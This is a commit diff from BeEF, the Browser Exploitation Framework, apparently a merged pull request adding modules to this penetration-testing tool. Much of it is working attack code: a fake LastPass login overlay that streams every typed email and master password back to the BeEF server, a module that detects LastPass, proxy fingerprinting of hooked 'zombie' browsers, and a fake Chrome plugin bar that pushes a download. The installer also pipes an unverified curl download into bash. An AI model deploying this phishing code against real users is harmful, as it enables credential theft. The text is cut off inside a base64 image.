Merge pull request #924 from phihag/install-pipeline-instead-of-fifo

Use a pipe instead of a fifo during installation

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.6.1-alpha
+0.4.4.7-alpha

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.6.1-alpha'
+    version: '0.4.4.7-alpha'
     debug: false
 
     restrictions:

core/main/client/browser.js

@@ -1098,7 +1098,7 @@ beef.browser = {
                 beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
             } catch (e) {
                 // warn on cross-domain
-                beef.debug("Hooking frame failed");
+                beef.debug("Hooking child frame failed: "+e.message);
             }
         }
     },
@@ -1113,7 +1113,7 @@ beef.browser = {
         if (!this.type().IE) {
             return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
         } else {
-            flash_versions = 11;
+            flash_versions = 12;
             flash_installed = false;
 
             if (window.ActiveXObject) {
@@ -1125,10 +1125,10 @@ beef.browser = {
                         }
                     }
                     catch (e) {
+                        beef.debug("Creating Flash ActiveX object failed: "+e.message);
                     }
                 }
             }
-            ;
             return flash_installed;
         }
     },
@@ -1154,7 +1154,7 @@ beef.browser = {
 
             }
 
-            // Internet Explorer
+        // Internet Explorer
         } else {
 
             try {
@@ -1162,6 +1162,7 @@ beef.browser = {
                 var qt_test = new ActiveXObject('QuickTime.QuickTime');
 
             } catch (e) {
+                beef.debug("Creating QuickTime ActiveX object failed: "+e.message);
             }
 
             if (qt_test) {
@@ -1174,7 +1175,7 @@ beef.browser = {
 
     },
 
-	/**
+    /**
      * Checks if the zombie has the RealPlayer plugin installed.
      * @return: {Boolean} true or false.
      *
@@ -1195,30 +1196,30 @@ beef.browser = {
 
             }
 
-            // Internet Explorer
+        // Internet Explorer
         } else {
 
-			var definedControls = [
-			    'RealPlayer',
-				'rmocx.RealPlayer G2 Control',
-			    'rmocx.RealPlayer G2 Control.1',
-			    'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
-			    'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
-				];
+            var definedControls = [
+              'RealPlayer',
+              'rmocx.RealPlayer G2 Control',
+              'rmocx.RealPlayer G2 Control.1',
+              'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
+              'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
+            ];
 
-			for (var i = 0; i < definedControls.length; i++) {
+            for (var i = 0; i < definedControls.length; i++) {
 
             	try {
-
-                	var rp_test = new ActiveXObject(definedControls[i]);
-
+                    var rp_test = new ActiveXObject(definedControls[i]);
             	} catch (e) {
+                    beef.debug("Creating RealPlayer ActiveX object failed: "+e.message);
             	}
 
-            	if ( rp_test ) {
-                	realplayer = true;
-            	}
-			}
+                if ( rp_test ) {
+                    realplayer = true;
+            	
+                }
+            }
         }
 
         return realplayer;
@@ -1254,6 +1255,7 @@ beef.browser = {
 	            var wmp_test = new ActiveXObject('WMPlayer.OCX');
 
 	        } catch (e) {
+                    beef.debug("Creating WMP ActiveX object failed: "+e.message);
 	        }
 
 	        if (wmp_test) {
@@ -1282,10 +1284,11 @@ beef.browser = {
             try {
                 control = new ActiveXObject("VideoLAN.VLCPlugin.2");
                 vlc = true ;
-                } catch(e) {
-                }
-        };
-        return vlc ;
+            } catch(e) {
+                    beef.debug("Creating VLC ActiveX object failed: "+e.message);
+            }
+        }
+        return vlc;
     },
 
     /**

core/main/handlers/browserdetails.rb

@@ -68,6 +68,7 @@ module BeEF
                       }
           zombie.httpheaders = @http_headers.to_json
           zombie.save
+          #puts "HTTP Headers: #{zombie.httpheaders}"
 
           # add a log entry for the newly hooked browser
           BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,56 @@ module BeEF
             self.err_msg "Invalid browser name returned from the hook browser's initial connection."
           end
 
+          # detect browser proxy
+          using_proxy = false
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'PROXY_CONNECTION',
+            'PROXY_AUTHENTICATE',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR',
+            'VIA'
+          ].each do |header|
+            unless JSON.parse(zombie.httpheaders)[header].nil?
+              using_proxy = true
+              break
+            end
+          end
+
+          # retrieve proxy client IP
+          proxy_clients = []
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR'
+          ].each do |header|
+            proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
+          end
+
+          # retrieve proxy server
+          proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
+
+          # store and log proxy details
+          if using_proxy == true
+            BD.set(session_id, 'UsingProxy', "#{using_proxy}")
+            proxy_log_string = "#{zombie.ip} is using a proxy"
+            unless proxy_clients.nil?
+              BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
+              proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
+            end
+            unless proxy_server.nil?
+              BD.set(session_id, 'ProxyServer', "#{proxy_server}")
+              proxy_log_string += " [server: #{proxy_server}]"
+            end
+            BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
+          end
+
           # get and store browser version
           browser_version = get_param(@data['results'], 'BrowserVersion')
           if BeEF::Filters.is_valid_browserversion?(browser_version)

install-beef

@@ -5,6 +5,8 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
+set -e
+
 clear
 echo "======================================"
 echo "          BeEF Installer   "
@@ -76,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then
 
 sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
 
-bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
+curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
 
 echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc
 

modules/browser/browser_fingerprinting/command.js

@@ -34,6 +34,10 @@ beef.execute(function() {
 		new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),
 		new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
 		new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
+		new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"),
+		new Array("Firefox","10+","chrome://browser/skin/sync-128.png"),
+		new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"),
+		new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"),
 		new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
 		new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
 		new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")

modules/browser/detect_lastpass/command.js

@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var result = "Not in use or not installed";
+
+	var lpdiv = document.getElementById('hiddenlpsubmitdiv');
+	if (typeof(lpdiv) != 'undefined' && lpdiv != null) {
+		//We've got the first detection of LP
+		result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
+	} else if ($j("script:contains(lastpass_iter)").length > 0) {
+		//We've got the second detection of LP
+		result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
+	} else {
+
+		//Form is not there, lets check for any form elements in this page, because, LP won't activate at all without a <form>
+		if (document.getElementsByTagName("form").length == 0) {
+			//No forms
+			result = "The page doesn't seem to include any forms - we can't tell if LastPass is installed";
+		}
+		
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass="+result);
+});
+

modules/browser/detect_lastpass/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_lastpass:
+            enable: true
+            category: "Browser"
+            name: "Detect LastPass"
+            description: "This module checks if the LastPass extension is installed and active."
+            authors: ["xntrik"]
+            target:
+                 not_working: ["IE"]
+                 working: ["All"]

modules/browser/detect_lastpass/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_lastpass < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['lastpass'] = @datastore['lastpass'] if not @datastore['lastpass'].nil?
+		save content
+	end
+
+end

modules/social_engineering/fake_lastpass/command.js

@@ -0,0 +1,39 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// Prepare the onmessage event handling
+	var eventMethod = window.addEventListener ? "addEventListener" : "attachEvent";
+	var eventer = window[eventMethod];
+	var messageEvent = eventMethod == "attachEvent" ? "onmessage" : "message";
+	eventer(messageEvent,function(e) {
+		if (e.data == "KILLFRAME") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Killing Frame');	
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'meta=KILLFRAME');	
+			beef.dom.removeElement('LPIFRAME');
+			return;
+		} else {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=' + e.data);	
+		}
+	},false);	
+
+	if (beef.browser.isC()) {
+		beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/index.html','id':'LPIFRAME'}, {'width':'375px','height':'415px','position':'fixed','right':'0px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'1px solid white','overflow':'hidden'}); 
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Chrome IFrame Created .. awaiting messages');	
+	} else {
+		// Don't know how NON Chrome browsers look - so just going to pop the FF dialog
+		beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/indexFF.html','id':'LPIFRAME'}, {'width':'280px','height':'345px','position':'fixed','left':(($j(window).width()/2)-140)+'px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'0px solid black','overflow':'hidden'}); 
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Non-Chrome IFrame Created .. awaiting messages');	
+	}
+
+	// $j('body').append("<div id='lp_login_dia' style='width:375px; height:415px; position: fixed; right: 0px; top: 0px; z-index: "+beef.dom.getHighestZindex()+1+"; border: 1px solid white; overflow: hidden; display: none'></div>");
+
+	// $j('#lp_login_dia').load(beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/lp/index.html");
+
+
+
+});

modules/social_engineering/fake_lastpass/config.yaml

@@ -5,11 +5,11 @@
 #
 beef:
     module:
-        fake_notification:
+        fake_lastpass:
             enable: true
             category: "Social Engineering"
-            name: "Fake Notification"
-            description: "Displays a fake notification at the top of the screen, similar to those presented in IE."
+            name: "Fake LastPass"
+            description: "Displays a fake LastPass user dialog."
             authors: ["xntrik"]
             target:
                 user_notify: ['ALL']

modules/social_engineering/fake_lastpass/index.html

@@ -0,0 +1,188 @@
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
+<style type="text/css">
+body { font-family: Helvetica,Arial;
+color:white;}
+
+#_docwrite_login_small7 { white-space:normal; width:258px !important; display:inline-block; }
+#showvault { vertical-align: top; }
+
+/* General */
+.clear         {clear:both;font-size:0;height:0;line-height:0;overflow:hidden;}
+
+table td       {
+	padding-right:10px;
+	white-space:nowrap;
+}
+
+
+	
+.dropStyle {
+  border:thin solid white;
+background: #919191 !important; /* for non-css3 browsers */
+  background: -webkit-gradient(linear, left top, left bottom, from(#a9a9a9), to(#7a7a7a)); /* for webkit browsers */
+  font-weight: bold;
+  color: #e7e5e5;
+  position:absolute;
+  cursor:default;
+  text-align:left;
+  font-size:12px;
+  z-index:10000;
+  height:120px;
+  overflow:auto;
+  }
+.item {
+}
+.focus {
+background: #0399d4 !important; /* for non-css3 browsers */
+	background: -webkit-gradient(linear, left top, left bottom, from(#04acec), to(#0186ba)) !important; /* for webkit browsers */
+	color: #fff !important;
+	-webkit-border-radius: 0;
+	-moz-border-radius: 0;
+	text-shadow: 0 1px 1px rgba(0, 0, 0, .1);
+	cursor:hand
+}
+
+.item[aria-disabled="true"] {
+  color: grey;
+}
+.offscreen {
+   position: absolute;
+  left: -9000px;
+  width: 0;
+  overflow: hidden;
+}
+
+body { padding:20px 10px 0px 50px; font:13px/150% Helvetica, Arial, Tahoma, sans-serif; }
+
+body{
+	background:url('q3Jrp.png') repeat;
+}
+
+.logintitle{
+font-size:16px; font-weight:bold; 
+text-shadow:1px 1px 2px #858585
+}
+
+/**.css3button { background-image:url(images/menu_btnsmall.png); height:30px; width:95px; line-height:30px; font-size:12px; color:white; text-align:center;
+cursor:hand;
+font-weight:bold;
+text-shadow:1px 1px 2px #858585}
+.css3button:hover { background-image:url(images/menuroll_btnsmall.png); cursor:hand; } **/
+
+.css3button {
+	font-family: Helvetica, Arial, sans-serif; font-weight:bold;
+	font-size: 14px;
+	color: #ffffff;
+	padding: 2px 15px;
+	background: -webkit-linear-gradient(top, rgba(32,188,232,1) 0%,rgba(0,119,232,1) 100%);
+	-webkit-border-radius: 30px;
+	border: 2px solid #ffffff;
+	-webkit-box-shadow:
+		0px 3px 11px rgba(000,000,000,0.5),
+		inset 0px 0px 1px rgba(005,000,004,1);
+	text-shadow:
+		0px -1px 0px rgba(000,000,000,0.2),
+		0px 1px 0px rgba(255,255,255,0.3);
+}
+
+.css3button:hover {
+	cursor:hand;
+	 background:-webkit-gradient(linear, left top, left bottom, color-stop(0%,#158aff), color-stop(44%,#0b7ef1), color-stop(100%,#126eca));
+}
+
+/** text area input with shadow **/
+
+
+.textarea { 
+	-webkit-transition: all 0.30s ease-in-out;
+	padding-left: 7px;
+	width:200px;
+	border: solid 1px #E5E5E5;
+	outline: 0;
+	font: normal 13px/100% Helvetica, Arial, Tahoma, sans-serif;
+	box-shadow: rgba(0,0,0, 0.1) 0px 0px 8px;
+	-moz-box-shadow: rgba(0,0,0, 0.1) 0px 0px 8px;
+	-webkit-box-shadow: inset 1 3px 1 hsla(0,0%,0%,0.1);
+	-webkit-border-radius: 10px;
+	}
+	
+checkbox {
+	padding: 4px;
+	}
+
+
+/** input focus darkening **/
+
+/*
+.textarea:hover, .textarea:focus { 
+	border-color: #C9C9C9; 
+	-webkit-box-shadow: 0px 0px 5px 2px #3d8bff;
+	}
+*/
+
+.glow { 
+	border-color: #C9C9C9; 
+   	-webkit-box-shadow:0 0 1px 3px hsla(210,100%,50%,0.8), 0 1px 0 hsla(0,0%,100%,0.3);
+
+	}
+
+
+.form label { 
+	margin-left: 10px; 
+	color: #999999;
+	font-weight:bold; 
+	}
+
+a:link, a:active {
+	font-weight : bold;
+	font-size : 12px;
+	font-family : helvetica;
+	color :white;
+	text-decoration : none;
+	padding-left:10px
+	}
+	
+	a:hover {
+		font-weight : bold;
+		font-size : 12px;
+		font-family : helvetica;
+		color : #09F;
+		text-decoration : none;
+		}
+		
+</style>
+<script src="jquery.js" type="text/javascript"></script>
+<script>
+$(document).ready(function() {
+	$('#u').keyup(function() {
+		parent.postMessage('Username field changed to: ' + $('#u').val(),'*');
+	});
+
+	$('#p').keyup(function() {
+		parent.postMessage('Password field changed to: ' + $('#p').val(),'*');
+	});
+
+	$('#rememberemail').change(function() {
+		parent.postMessage('Remember Email changed to: ' + $('#rememberemail').prop('checked'),'*');
+	});
+
+	$('#rememberpassword').change(function() {
+		parent.postMessage('Remember Password changed to: ' + $('#rememberpassword').prop('checked'),'*');
+	});
+
+	$('#showvault').change(function() {
+		parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
+	});
+
+	$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
+		parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
+		parent.postMessage('KILLFRAME','*');
+	});
+
+});
+
+</script>
+</head><body><img src='lpwhite_small.png'/><p><div id="reprompttext" style="display: none;"><br><span id="_docwrite_login_small1"></span><br><br></div><div id="nodbtext" style="display: none; color: red;"><br><b><span id="_docwrite_login_small2"></span></b><br><br></div>
+<form id='f'><table><tr><td class='logintitle'><span id="_docwrite_login_small3">Email</span></td></tr><tr><td><input type='text' id='u' class='textarea' name='username' value=''/>&nbsp;&nbsp;<img id="deleteicon" src="xsmall.png" valign="middle"></td></tr><tr><td class='logintitle'><span id="_docwrite_login_small4">Password</span></td></tr><tr><td><input type='password' class='textarea' id='p' name='password'/></td></tr><tr id="rememberemailrow"><td><input type='checkbox' name='rememberemail' id='rememberemail'/>&nbsp;&nbsp;<label for="rememberemail"><span id="_docwrite_login_small5">Remember Email</span></label></td></tr><tr id="rememberpasswordrow"><td><input type='checkbox' name='rememberpassword' id='rememberpassword'/>&nbsp;&nbsp;<label for="rememberpassword"><span id="_docwrite_login_small6">Remember Password</span></label></td></tr><tr id="showvaultrow"><td><input type='checkbox' name='showvault' id='showvault'/>&nbsp;&nbsp;<label for="showvault"><span id="_docwrite_login_small7">Show Vault After Login</span></label></td></tr><tr id="donotrepromptforrow" style="display: none;"><td>&nbsp;</td><td><input type='checkbox' name='donotrepromptfor' id='donotrepromptfor'/>&nbsp;&nbsp;<label for="donotrepromptfor"><span id="_docwrite_login_small8"></span></label><select id="donotrepromptforsecs"><option value="0"></option><option value="30" id="_docwrite_login_small9"></option><option value="60" id="_docwrite_login_small10"></option><option value="300" id="_docwrite_login_small11"></option><option value="900" id="_docwrite_login_small12"></option><option value="1800" id="_docwrite_login_small13"></option><option value="3600" id="_docwrite_login_small14"></option><option value="10800" id="_docwrite_login_small15"></option><option value="21600" id="_docwrite_login_small16"></option><option value="43200" id="_docwrite_login_small17"></option><option value="86400" id="_docwrite_login_small18"></option></select></td></tr><div id='btnrow' class='btnrow'><table class='buttontable'><tr><td><div class='css3button' id='login'/><span id="_docwrite_login_small19">Login</span></div></div></td><td><div class='css3button' id='cancel'/><span id="_docwrite_login_small20">Cancel</span></div></td></tr></table></div></td></table></table></form><div id='links'><span id="forgotcontainer"><img src="key_small.png"><a id='forgot' href='#'><span id="_docwrite_login_small21">I forgot my password, Help</span></a><br/></span><span id="screenkeyboardcontainer"><img src="screenkeyboard.png"><a id='screenkeyboard' href='#'><span id="_docwrite_login_small22">Screen Keyboard</span></a><br/></span><span id="createaccountcontainer"><img src="create_small.png"><a id='createaccount' href='#'><span id="_docwrite_login_small23">Create Account</span></a><br/></span></div><div id='error'></div>
+
+</body></html>

modules/social_engineering/fake_lastpass/indexFF.html

@@ -0,0 +1,72 @@
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
+<style type="text/css">
+body { font-family: Helvetica,Arial;
+color:-moz-DialogText;
+background-color: #ededed;
+font: message-box;
+}
+
+
+</style>
+<script src="jquery.js" type="text/javascript"></script>
+<script>
+$(document).ready(function() {
+	$('#u').keyup(function() {
+		parent.postMessage('Username field changed to: ' + $('#u').val(),'*');
+	});
+
+	$('#p').keyup(function() {
+		parent.postMessage('Password field changed to: ' + $('#p').val(),'*');
+	});
+
+	$('#rememberemail').change(function() {
+		parent.postMessage('Remember Email changed to: ' + $('#rememberemail').prop('checked'),'*');
+	});
+
+	$('#rememberpassword').change(function() {
+		parent.postMessage('Remember Password changed to: ' + $('#rememberpassword').prop('checked'),'*');
+	});
+
+	$('#showvault').change(function() {
+		parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
+	});
+
+	$('#disableffpwd').change(function() {
+		parent.postMessage('Disable FF Password Management changed to: ' + $('disableffpwd').prop('checked'),'*');
+	});
+
+	$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
+		parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
+		parent.postMessage('KILLFRAME','*');
+	});
+
+});
+
+</script>
+</head><body>
+
+<div style="text-align: center; padding-bottom:5px"><img src="icon.png" /></div>
+<form>
+<div style="text-align: center">
+	<div style="text-align: left; padding-bottom:5px">Email</div>
+	<div style="text-align: left; padding-bottom:5px"><input type="text" style="width:245px;height:20px" id='u' /></div>
+	<div style="text-align: left; padding-bottom:5px">Master Password</div>
+	<div style="text-align: left; padding-bottom:5px"><input type="password" style="width:245px;height:20px" id='p' /></div>
+	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" checked="checked" id='rememberemail'>Remember Email</input></div>
+	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" id='rememberpassword'>Remember Password</input></div>
+	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" checked="checked" id='showvault'>Show My LastPass Vault After Login</input></div>
+	<div style="text-align: left; padding-bottom:10px"><input type="checkbox" checked="checked" id='disableffpwd'>Disable Insecure Firefox Password Management</input></div>
+</div>
+
+<div style="text-align:center; padding-bottom:5px">
+	<div style="text-align:left; padding-bottom: 5px"><a href="#" style="text-decoration: none" id='forgot'>I forgot my password, Help!</a></div>
+	<div style="text-align:left; padding-bottom: 10px"><a href="#" style="text-decoration: none" id='screenkeyboard'>Screen Keyboard</a> &nbsp;&nbsp; <a href="#" style="text-decoration: none" id='createaccount'>Create an Account</a></div>
+</div>
+
+<div style="text-align:right">
+	<input type="button" value="Cancel" style="width:77px; height:21px" id='cancel' /> <input type="button" value="Login" style="width:77px; height:21px" id='login' />
+</div>
+</form>
+
+
+</body></html>

modules/social_engineering/fake_lastpass/module.rb

@@ -0,0 +1,43 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_lastpass < BeEF::Core::Command
+  
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/index.html','/lp/index','html')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/indexFF.html','/lp/indexFF','html')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/key_small.png','/lp/key_small','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/lpwhite_small.png','/lp/lpwhite_small','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/q3Jrp.png','/lp/q3Jrp','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/screenkeyboard.png','/lp/screenkeyboard','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/xsmall.png','/lp/xsmall','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/create_small.png','/lp/create_small','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/icon.png','/lp/icon','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/jquery-1.5.2.min.js','/lp/jquery','js')
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    if (@datastore['meta'] == "KILLFRAME") 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/index.html')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/indexFF.html')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/key_small.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/lpwhite_small.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/q3Jrp.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/screenkeyboard.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/xsmall.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/create_small.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/icon.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/jquery.js') 
+    end
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end

modules/social_engineering/fake_notification_c/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_notification_c:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake Notification Bar (Chrome)"
+            description: "Displays a fake notification bar at the top of the screen, similar to those presented in Chrome. If the user clicks the notification they will be prompted to download the file specified below."
+            authors: ["xntrik", "bcoles"]
+            target:
+                user_notify: ['ALL']

modules/social_engineering/fake_notification_c/module.rb

@@ -0,0 +1,29 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_notification_c < BeEF::Core::Command
+
+  def self.options
+    return [
+      {'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe', 'width'=>'150px'},
+      { 'name' => 'notification_text',
+        'description' => 'Text displayed in the notification bar',
+        'ui_label' => 'Notification text',
+        'value' => "Additional plugins are required to display all the media on this page."
+      }
+    ]
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end

modules/social_engineering/fake_notification_ff/command.js

@@ -0,0 +1,36 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var id = beef.dom.generateID();
+	var pid = beef.dom.generateID();
+	var zztop = beef.dom.getHighestZindex()+1;
+	var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'});
+	var ell = beef.dom.createElement('div',{'style':'width: 16px; height: 18px; padding: 0; margin: 3px 0px 5px 5px; position: absolute; left: 0px; top: 0px; background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABcAAAAWCAIAAACkFJBSAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAK3SURBVDhPpZD7T1JhHMbPn1NbrdvKmpmtieJdyBuCXA/e8IJRDtOJiEpkNUzEG6QCivWDrlroxDnNbtqWzqwxMZU0jyDayi6uA1vfRF/PUn9i++zsOS/P8+EFzL/xKHgw/8bDw/CtH/rRfxPMD9UD6CEcrY+t8vEh9eay+ZDO3hAs1v38Isy6O1nnQ47Hx4RODGsO7FAPwdK9ny13d0dLKSOJXiDhLs6YDuxQDzG/twsx+Vxj7ysfsylf9Kssxoq8HN6t6uLJsXtvh2vh8PWg6pvLSO2jjPm8lh3WLMqbvNMnjwJnzxyjR4ZzOSlXGdF02oVLoSdPnTjCSLjsfHd/r4+GXgtYzAHINXNVRV58bAQjkZ7MjGWzmLiQnclOhteEOBogyWG73jejPjVgvjVTANLTqVZJYZmbzReLODlZPAjwDCASZMik+OK0fmFK65ltgjIaQgBLB+JZn66nq2looOf6tVwkAlfAy2Uz61RCLuuKQp5KOHTUIVjaET+I3p/uJ+R6r9WshUsFrhMgW8xlpSVFR4WHh52LooXOvNJQh5jP04542a94M6hcnqmvqykQ8NLh+7PwTNiDBQJc0G7r1KjLGuur3E4DdQgWYwDSbczFk+LoIRI8hpkYKeSny0sKbsgkYhEbFPCsKCv84jBtrg5uErZ/f8ruEAJGegw7uA0qRX4ULSwy4mJaSry+oXbBYf84ZVNXl+LCDLAU5fPnp7Sk58E2u6vtgJHuNoTJUMnlJAt4abDp7a78vdK26tDfrpGKBCwQCfmpjok6ah9lsLQiRge0JbI8+P3FRWLdXal3TjduV/I4DGkhriiXqavlrukGah9ljFxtQXxfti7NDS/NjXx2jhCfnm6tGL+6umY/jLico8T8kGexf4top/ZRBktz8IBFHzwYSTQGD/aH